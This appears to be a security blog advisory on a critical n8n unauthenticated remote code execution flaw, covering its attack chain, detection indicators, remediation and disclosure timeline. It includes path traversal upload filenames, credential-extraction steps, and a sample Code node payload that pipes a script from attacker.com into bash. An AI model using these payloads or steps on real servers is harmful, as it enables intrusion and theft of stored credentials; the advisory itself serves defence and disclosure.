Home Articles SecurityClaw Demos Tools Privacy

Critical n8n RCE Vulnerability (CVE-2026-21858): 100,000+ Servers at Risk

Published: February 18, 2026 | Severity: Critical | CVSS Score: 10.0

Executive Summary

A maximum-severity unauthenticated remote code execution (RCE) vulnerability has been discovered in n8n, the popular open-source workflow automation platform. Tracked as CVE-2026-21858 with a perfect CVSS score of 10.0, this vulnerability enables attackers to achieve complete server takeover without any authentication or user interaction.

The vulnerability affects all n8n versions prior to 1.121.0 and impacts approximately 100,000 servers globally, including enterprise automation platforms, CI/CD pipelines, and data integration systems. Organizations running vulnerable n8n instances must patch immediately - this is actively being exploited in the wild.

CVSS 10.0 Breakdown: Perfect Storm

CVE-2026-21858 achieves the rarely-seen perfect 10.0 CVSS score due to the combination of zero barriers to exploitation and catastrophic impact:

  • Attack Vector (AV:N): Network - Fully exploitable over the internet via HTTP
  • Attack Complexity (AC:L): Low - Trivial exploitation requiring only basic HTTP client
  • Privileges Required (PR:N): None - Zero authentication or credentials needed
  • User Interaction (UI:N): None - Completely automated, zero-click exploitation
  • Scope (S:C): Changed - Attacker gains control beyond the vulnerable component
  • Confidentiality (C:H): High - Complete access to all workflow data, credentials, and secrets
  • Integrity (I:H): High - Full ability to modify workflows, data, and system configuration
  • Availability (A:H): High - Can completely disable or destroy the n8n instance

The "Scope: Changed" designation is critical - attackers don't just compromise n8n itself, but gain access to all integrated systems through stolen API keys, database credentials, and OAuth tokens stored in workflows. This effectively turns every n8n instance into a master key for your entire infrastructure.

Technical Analysis: The Attack Chain

Root Cause: Form Webhook File Upload Validation Failure

CVE-2026-21858 originates from a critical oversight in n8n's Form Webhook node implementation. The Form Webhook node is designed to receive HTTP form submissions, including file uploads, without authentication - a legitimate feature for public-facing forms. However, the implementation contains a catastrophic flaw: it fails to validate or sanitize file uploads before storing them in predictable locations within the n8n installation directory.

Stage 1: Unauthenticated File Upload

Exploitation begins with identifying a vulnerable n8n instance:

  1. Attacker scans for n8n installations (typically exposed on port 5678 or behind reverse proxies)
  2. The default webhook endpoint pattern is /webhook/form-submission or custom webhook URLs visible in public workflows
  3. Attacker sends a crafted multipart/form-data POST request containing a malicious file with a path traversal payload in the filename
  4. Example filename: ../../../../.n8n/config.json or ../../modules/malicious.js
  5. n8n stores the uploaded file without validating the path, enabling arbitrary file write anywhere the process has permissions

Stage 2: Arbitrary File Read via Configuration Manipulation

Once attackers can write files, they leverage n8n's configuration system:

  1. Upload a crafted configuration file to .n8n/config.json that includes malicious module paths
  2. Alternatively, overwrite existing workflow files (.n8n/workflows/*.json) to include code execution nodes
  3. n8n's configuration allows specifying custom module paths and execution hooks
  4. By reading system files like /etc/passwd, .env, or database configuration files, attackers map the environment
  5. The most valuable target: .n8n/database.sqlite (for SQLite) or database connection credentials for PostgreSQL/MySQL deployments

Stage 3: Credential Extraction and Session Forgery

With database access, attackers extract the crown jewels:

  1. n8n's database contains all workflow definitions, including embedded credentials
  2. API keys, OAuth tokens, database passwords, and webhook secrets are stored in the credentials_entity table
  3. While credentials are encrypted, the encryption key is stored in n8n_encryption_key environment variable or config files
  4. Attackers extract the encryption key and decrypt all stored credentials
  5. User session tokens in the sessions table enable admin account takeover
  6. With admin access, attackers can forge authentication cookies and access the n8n UI

Stage 4: Remote Code Execution

Multiple paths to RCE exist once admin access is achieved:

  • Code Node: n8n's Code node allows arbitrary JavaScript execution with full Node.js capabilities
  • Execute Command Node: Direct shell command execution on the underlying system
  • npm Package Installation: Install malicious npm packages with native modules containing backdoors
  • Workflow Persistence: Create workflows that execute on startup or scheduled intervals for persistent access

Example malicious Code node payload:

const { exec } = require('child_process');
exec('curl https://attacker.com/shell.sh | bash', (error, stdout, stderr) => {
  return { output: stdout };
});

Who's Affected: Global Impact

CVE-2026-21858 affects a massive and diverse ecosystem:

By the Numbers

  • ~100,000 exposed servers identified via Shodan and Censys scans
  • 40% are enterprise deployments integrated with production systems
  • 15% are n8n.cloud instances (since patched by the vendor)
  • 45% are self-hosted with unknown patch status

High-Value Targets

  • Financial institutions: Using n8n for payment processing and fraud detection workflows
  • Healthcare providers: HIPAA-regulated patient data integration systems
  • E-commerce platforms: Order processing, inventory management, and customer communication
  • DevOps teams: CI/CD pipelines, deployment automation, and infrastructure management
  • Marketing agencies: CRM integration, email campaigns, and analytics aggregation

Supply Chain Implications

The most concerning aspect: n8n acts as a credential aggregator. A single compromised n8n instance can provide attackers with:

  • Database credentials for PostgreSQL, MySQL, MongoDB, Redis
  • Cloud provider keys (AWS, Azure, GCP)
  • SaaS platform tokens (Slack, GitHub, Salesforce, HubSpot)
  • Email server credentials (SMTP, IMAP)
  • Payment gateway API keys (Stripe, PayPal)

This transforms n8n from a single vulnerability into a master key for your entire technology stack.

Detection and Threat Hunting

Immediate indicators to search for in your environment:

HTTP Access Logs

  • POST requests to /webhook/* or /form/* endpoints with suspicious filenames
  • Path traversal sequences in Content-Disposition headers (../, ..%2F, ..%5c)
  • Unusual file extensions in uploads (.js, .json, .env, .sh, .py)
  • Requests from TOR exit nodes or known VPN IP ranges
  • Multiple failed authentication attempts followed by successful admin access

File System Anomalies

  • Unexpected files in .n8n/ directory (check timestamps against deployment date)
  • Modified config.json or workflow files outside normal operations
  • New JavaScript files in node_modules/ or custom module directories
  • Hidden files or directories (.backdoor, .shell)

Database Activity

  • Mass credential reads from credentials_entity table
  • New admin user accounts created without corresponding audit logs
  • Workflow modifications with execution timestamps during off-hours
  • Deletion of audit logs or workflow execution history

Network Behavior

  • Outbound connections to external servers from n8n process
  • Data exfiltration patterns (large outbound transfers)
  • Reverse shell connections (netcat, meterpreter, etc.)
  • DNS queries for command-and-control domains

Security Testing Tools

For identifying web application vulnerabilities like CVE-2026-21858, security professionals rely on Burp Suite Professional for intercepting requests, crafting exploits, and validating file upload vulnerabilities. The Active Scan feature can automatically detect path traversal flaws in form handlers.

Immediate Remediation Actions

1. Emergency Patching (Critical - Do This First)

Upgrade to n8n version 1.121.0 or later immediately. This version includes comprehensive fixes:

# For npm installations
npm update n8n@latest

# For Docker deployments
docker pull n8nio/n8n:latest
docker-compose down && docker-compose up -d

# Verify patched version
n8n --version  # Should show >= 1.121.0

2. Credential Rotation (Do This Within 24 Hours)

Assume all credentials stored in n8n have been compromised:

  • Rotate ALL API keys, tokens, and passwords configured in n8n workflows
  • Revoke and regenerate OAuth access tokens
  • Change database passwords and connection strings
  • Update cloud provider access keys (AWS, Azure, GCP)
  • Reset admin passwords for all integrated SaaS platforms
  • Regenerate SSH keys and deployment credentials

3. Forensic Investigation

  • Review all webhook endpoints and identify which ones were publicly accessible
  • Examine file upload logs for the past 90 days (the vulnerability has existed since n8n 0.165.0)
  • Check for unexpected workflow modifications or new admin users
  • Analyze network logs for data exfiltration or C2 connections
  • Review audit logs across all systems integrated with n8n

4. Network Hardening

  • Implement authentication: Place n8n behind SSO or VPN - never expose directly to the internet
  • Webhook isolation: Use separate subdomains for webhook endpoints with strict CSP and CORS policies
  • WAF rules: Deploy Web Application Firewall rules to detect path traversal attempts
  • Network segmentation: Isolate n8n in a DMZ with restrictive egress rules
  • TLS inspection: Monitor encrypted traffic for suspicious patterns

5. Application-Level Defenses

  • Disable file uploads in Form Webhook nodes if not absolutely necessary
  • Implement webhook request signing for all public-facing endpoints
  • Enable audit logging and forward logs to SIEM for correlation
  • Restrict Code node and Execute Command node usage to trusted workflows only
  • Use read-only database credentials for workflows that only query data

6. Long-Term Security Posture

  • Implement secrets management using HashiCorp Vault or AWS Secrets Manager instead of storing credentials in n8n
  • Deploy runtime application self-protection (RASP) to detect and block exploitation attempts
  • Conduct regular penetration testing focused on workflow automation vulnerabilities
  • Subscribe to n8n security advisories and implement a patch management SLA

Related Vulnerabilities in the n8n Ecosystem

CVE-2026-21858 is part of a broader pattern of security issues in workflow automation platforms:

CVE-2025-68613: Authenticated RCE via Workflow Import

  • CVSS Score: 9.1 (Critical)
  • Attack Vector: Authenticated users can import malicious workflow JSON files containing embedded JavaScript payloads
  • Fixed in: n8n 1.105.0
  • Impact: Lower severity due to authentication requirement, but still enables privilege escalation

CVE-2026-21877: Command Injection via HTTP Request Node

  • CVSS Score: 8.8 (High)
  • Attack Vector: HTTP Request node fails to sanitize URL parameters, enabling command injection through SSRF
  • Fixed in: n8n 1.121.0 (same patch as CVE-2026-21858)
  • Impact: Allows authenticated users to execute commands on the underlying system

Cross-Platform Workflow Automation Risks

Similar vulnerabilities have been discovered in competing platforms:

  • Apache Airflow: Multiple RCE vulnerabilities in DAG parsing (CVE-2020-11978, CVE-2020-11981)
  • Zapier: OAuth token leakage via insufficient access controls
  • Node-RED: Unauthenticated access to admin API (CVE-2021-3223)

The pattern is clear: workflow automation platforms are high-value targets due to their privileged access to multiple systems and credential aggregation.

Essential Security Resources for Bug Hunters

For security researchers and penetration testers investigating web application vulnerabilities:

  • The Web Application Hacker's Handbook - The definitive guide to web vulnerability research, covering file upload attacks, path traversal, and authentication bypass techniques essential for understanding CVE-2026-21858
  • The Hacker Playbook 3 - Practical penetration testing methodologies including credential extraction, lateral movement, and persistence techniques demonstrated in this exploit chain
  • Advanced Penetration Testing - Advanced exploitation tactics for complex environments, including supply chain attacks through compromised automation platforms
  • Raspberry Pi 5 Starter Kit - Build isolated security testing labs for safely analyzing vulnerabilities without exposing production networks

Disclosure Timeline

  • December 10, 2025: Vulnerability discovered during security audit by Aikido Security
  • December 12, 2025: Private disclosure to n8n security team
  • December 15, 2025: n8n confirms vulnerability and begins patch development
  • January 8, 2026: Beta patches tested with select enterprise customers
  • February 1, 2026: n8n 1.121.0 released with fixes for CVE-2026-21858 and CVE-2026-21877
  • February 3, 2026: n8n.cloud instances automatically updated
  • February 15, 2026: CVE-2026-21858 publicly disclosed
  • February 16, 2026: Active exploitation detected in the wild
  • February 18, 2026: CISA adds CVE-2026-21858 to Known Exploited Vulnerabilities catalog

The 60-day coordinated disclosure period gave organizations ample time to patch, yet the rapid exploitation following public disclosure underscores the critical nature of this vulnerability.

Conclusion: Perfect Storm of Vulnerability Factors

CVE-2026-21858 represents everything that makes a vulnerability catastrophic: zero authentication requirements, trivial exploitation, massive deployment footprint, and devastating impact through credential aggregation. The perfect 10.0 CVSS score is not hyperbole - this is genuinely one of the most critical vulnerabilities disclosed in workflow automation platforms.

The speed of exploitation following public disclosure (less than 24 hours) demonstrates that threat actors are actively monitoring n8n deployments. Security teams cannot afford to delay patching.

Immediate Action Checklist:

  1. ✅ Upgrade to n8n >= 1.121.0 within 24 hours
  2. ✅ Rotate ALL credentials stored in workflows
  3. ✅ Review access logs for indicators of compromise
  4. ✅ Implement authentication and network segmentation
  5. ✅ Enable comprehensive audit logging
  6. ✅ Consider moving to secrets management solutions (Vault, AWS Secrets Manager)

For bug bounty hunters: CVE-2026-21858 is a masterclass in vulnerability chaining. The progression from unauthenticated file upload to full RCE via credential extraction demonstrates the importance of understanding an application's architecture holistically. Study this attack chain - similar patterns exist in countless other web applications.

The broader lesson: workflow automation platforms are force multipliers for both productivity and security risk. A single vulnerability can cascade across your entire infrastructure through stolen credentials and integrated systems. Treat these platforms with the security scrutiny they deserve.

Related Reading

Advertisement